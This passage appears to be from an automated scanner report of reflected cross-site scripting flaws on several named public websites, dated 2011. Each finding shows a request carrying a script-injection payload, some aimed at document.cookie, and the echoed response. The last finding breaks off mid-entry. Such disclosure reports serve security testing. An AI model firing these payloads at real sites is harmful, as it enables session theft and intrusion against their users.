The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5d4d0--><script>alert(1)</script>fb8d8fcf9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/voip_wholesalers/chart.html?5d4d0--><script>alert(1)</script>fb8d8fcf9c=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:45 GMT
Connection: close
Content-Type: text/html
Content-Length: 85300

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Quick Reference Chart</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldm
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/voip_wholesalers/chart.html?5d4d0--><script>alert(1)</script>fb8d8fcf9c=1 -->
...[SNIP]...

3.104. http://www.isp-planet.com/services/voip_wholesalers/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/voip_wholesalers/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2777d--><script>alert(1)</script>a0764eaf025 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/voip_wholesalers/index.html?2777d--><script>alert(1)</script>a0764eaf025=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:45 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:45 GMT
Connection: close
Content-Type: text/html
Content-Length: 50503

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldman">
<meta
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/voip_wholesalers/index.html?2777d--><script>alert(1)</script>a0764eaf025=1 -->
...[SNIP]...

3.105. http://www.isp-planet.com/services/webmail/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/webmail/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c270e--><script>alert(1)</script>95e5514ff52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/webmail/index.html?c270e--><script>alert(1)</script>95e5514ff52=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:43 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:43 GMT
Connection: close
Content-Type: text/html
Content-Length: 52664

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Webmail Directory</title>
<m
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/webmail/index.html?c270e--><script>alert(1)</script>95e5514ff52=1 -->
...[SNIP]...

3.106. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.liverpoolonlinedegrees.co.uk
Path:   /2x/prequal.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60daf"><script>alert(1)</script>16c9b78682c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2x/prequal.jsp?60daf"><script>alert(1)</script>16c9b78682c=1 HTTP/1.1
Host: www.liverpoolonlinedegrees.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE"
Cache-Control: public
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 15:01:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=N-jN3kyh3uilQ9ki86RTyA**.app2-all2; Path=/
Set-Cookie: CLK=0#1298041265948; Expires=Sat, 16-Feb-2019 15:01:05 GMT; Path=/
Set-Cookie: CLK=0#1298041265948; Expires=Sat, 16-Feb-2019 15:01:05 GMT; Path=/
Content-Length: 32995

<!-- Copyright Quinstreet Inc., 2011 -->
<html>
<head>
<title> University of Liverpool</title>
<link rel="stylesheet" href="Style.css" type="text/css"/>
<script language="JavaScript" type="text/javasc
...[SNIP]...
<Input Name="LeadSiteURL" Value="http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp?60daf"><script>alert(1)</script>16c9b78682c=1" Type="hidden" tabIndex="19"/>
...[SNIP]...

3.107. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af71b"><script>alert(1)</script>c827934797a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /outsourcing-dot-net-development-contact-us.html?af71b"><script>alert(1)</script>c827934797a=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:23:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 9326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<form id="contactus" method="post" action="/outsourcing-dot-net-development-contact-us.html?af71b"><script>alert(1)</script>c827934797a=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

3.108. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3906b"><script>alert(1)</script>e3021d3c780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss-cross-site-scripting.html?3906b"><script>alert(1)</script>e3021d3c780=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:58:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81; path=/
Connection: close
Content-Type: text/html
Content-Length: 18193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
<form id="contactus" method="post" action="/xss-cross-site-scripting.html?3906b"><script>alert(1)</script>e3021d3c780=1#contact" onsubmit="return validateCompleteForm(this);">
...[SNIP]...

3.109. http://www.palmblvd.com/ [e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.palmblvd.com
Path:   /

Issue detail

The value of the e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f request parameter is copied into an HTML comment. The payload 838ab--><script>alert(1)</script>8aeba5f5436 was submitted in the e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1838ab--><script>alert(1)</script>8aeba5f5436 HTTP/1.1
Host: www.palmblvd.com
Proxy-Connection: keep-alive
Referer: http://www.palmblvd.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:22:27 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:23:27 GMT
Content-Type: text/html
Content-Length: 70947

<HTML>
<HEAD>
<TITLE>Palm Boulevard: Newsletters</TITLE>
<META name="resource-type" content="document">
<META name="distribution" content="global">
<META NAME="date" CONTENT="">
<META NAME="
...[SNIP]...
<!-- marketplace01: Missing QUAD ads for page_type: other on path www.palmblvd.com with position A1
url: /?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1838ab--><script>alert(1)</script>8aeba5f5436 -->
...[SNIP]...

3.110. http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.palmblvd.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e9235--><script>alert(1)</script>627b6f7c09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?e9235--><script>alert(1)</script>627b6f7c09f=1 HTTP/1.1
Host: www.palmblvd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:57:48 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:58:48 GMT
Connection: close
Content-Type: text/html
Content-Length: 70187

<HTML>
<HEAD>
<TITLE>Palm Boulevard: Newsletters</TITLE>
<META name="resource-type" content="document">
<META name="distribution" content="global">
<META NAME="date" CONTENT="">
<META NAME="
...[SNIP]...
<!-- marketplace01: Missing QUAD ads for page_type: other on path www.palmblvd.com with position A1
url: /?e9235--><script>alert(1)</script>627b6f7c09f=1 -->
...[SNIP]...

3.111. http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pdastreet.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 79bf7--><script>alert(1)</script>338075590f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?79bf7--><script>alert(1)</script>338075590f4=1 HTTP/1.1
Host: www.pdastreet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:59:32 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:00:32 GMT
Connection: close
Content-Type: text/html
Content-Length: 69345

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>PDAStreet - The PDA Network for Handheld Computers, PDA Software, Windows CE, Pocket PC, Palm Pilot, Psion, iPaq, Pocket PC 2002,
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.pdastreet.com with position V
url: /?79bf7--><script>alert(1)</script>338075590f4=1 -->
...[SNIP]...

3.112. http://www.phpbuilder.com/ [7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The value of the 7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 request parameter is copied into an HTML comment. The payload 4ebfc--><script>alert(1)</script>0eb00a3c424 was submitted in the 7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=14ebfc--><script>alert(1)</script>0eb00a3c424 HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.phpbuilder.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:20:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:21:54 GMT
Content-Type: text/html
Content-Length: 72352


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T
url: /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=14ebfc--><script>alert(1)</script>0eb00a3c424 -->
...[SNIP]...

3.113. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7640d--><script>alert(1)</script>eb4ef76d865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?7640d--><script>alert(1)</script>eb4ef76d865=1 HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:57:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:58:36 GMT
Connection: close
Content-Type: text/html
Content-Length: 72210


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T
url: /?7640d--><script>alert(1)</script>eb4ef76d865=1 -->
...[SNIP]...

3.114. http://www.phpbuilder.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4afe8--><script>alert(1)</script>959f959b02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico4afe8--><script>alert(1)</script>959f959b02d HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 15:20:29 GMT
Server: Apache
Content-Type: text/html
Content-Length: 43228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T
url: /favicon.ico4afe8--><script>alert(1)</script>959f959b02d -->
...[SNIP]...

3.115. http://www.phpbuilder.com/welcomead/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /welcomead/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload fb26c--><script>alert(1)</script>a4e106c783c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /welcomeadfb26c--><script>alert(1)</script>a4e106c783c/ HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.phpbuilder.com/?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 15:20:30 GMT
Server: Apache
Content-Type: text/html
Content-Length: 43262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: index on path www.phpbuilder.com with position T
url: /welcomeadfb26c--><script>alert(1)</script>a4e106c783c/ -->
...[SNIP]...

3.116. http://www.smartphonetoday.com/ [10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartphonetoday.com
Path:   /

Issue detail

The value of the 10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 request parameter is copied into an HTML comment. The payload e3c0e--><script>alert(1)</script>db344f8e464 was submitted in the 10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1e3c0e--><script>alert(1)</script>db344f8e464 HTTP/1.1
Host: www.smartphonetoday.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.smartphonetoday.com/%3F10d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E11ae5b1cf82%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:19:21 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:20:21 GMT
Content-Type: text/html
Content-Length: 85506

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>SmartPhone Today - The Complete Independent SmartPhone Information Resource </TITLE>
<META name="description" content="The Inte
...[SNIP]...
<!-- marketplace04: Missing QUAD ads for page_type: other on path www.smartphonetoday.com with position E1
url: /?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1e3c0e--><script>alert(1)</script>db344f8e464 -->
...[SNIP]...

3.117. http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartphonetoday.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 10d85--><script>alert(1)</script>11ae5b1cf82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?10d85--><script>alert(1)</script>11ae5b1cf82=1 HTTP/1.1
Host: www.smartphonetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:57:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:58:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 84610

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>SmartPhone Today - The Complete Independent SmartPhone Information Resource </TITLE>
<META name="description" content="The Inte
...[SNIP]...
<!-- marketplace04: Missing QUAD ads for page_type: other on path www.smartphonetoday.com with position E1
url: /?10d85--><script>alert(1)</script>11ae5b1cf82=1 -->
...[SNIP]...

3.118. http://www.thecounter.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thecounter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6955f--><script>alert(1)</script>e525c47aab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?6955f--><script>alert(1)</script>e525c47aab4=1 HTTP/1.1
Host: www.thecounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
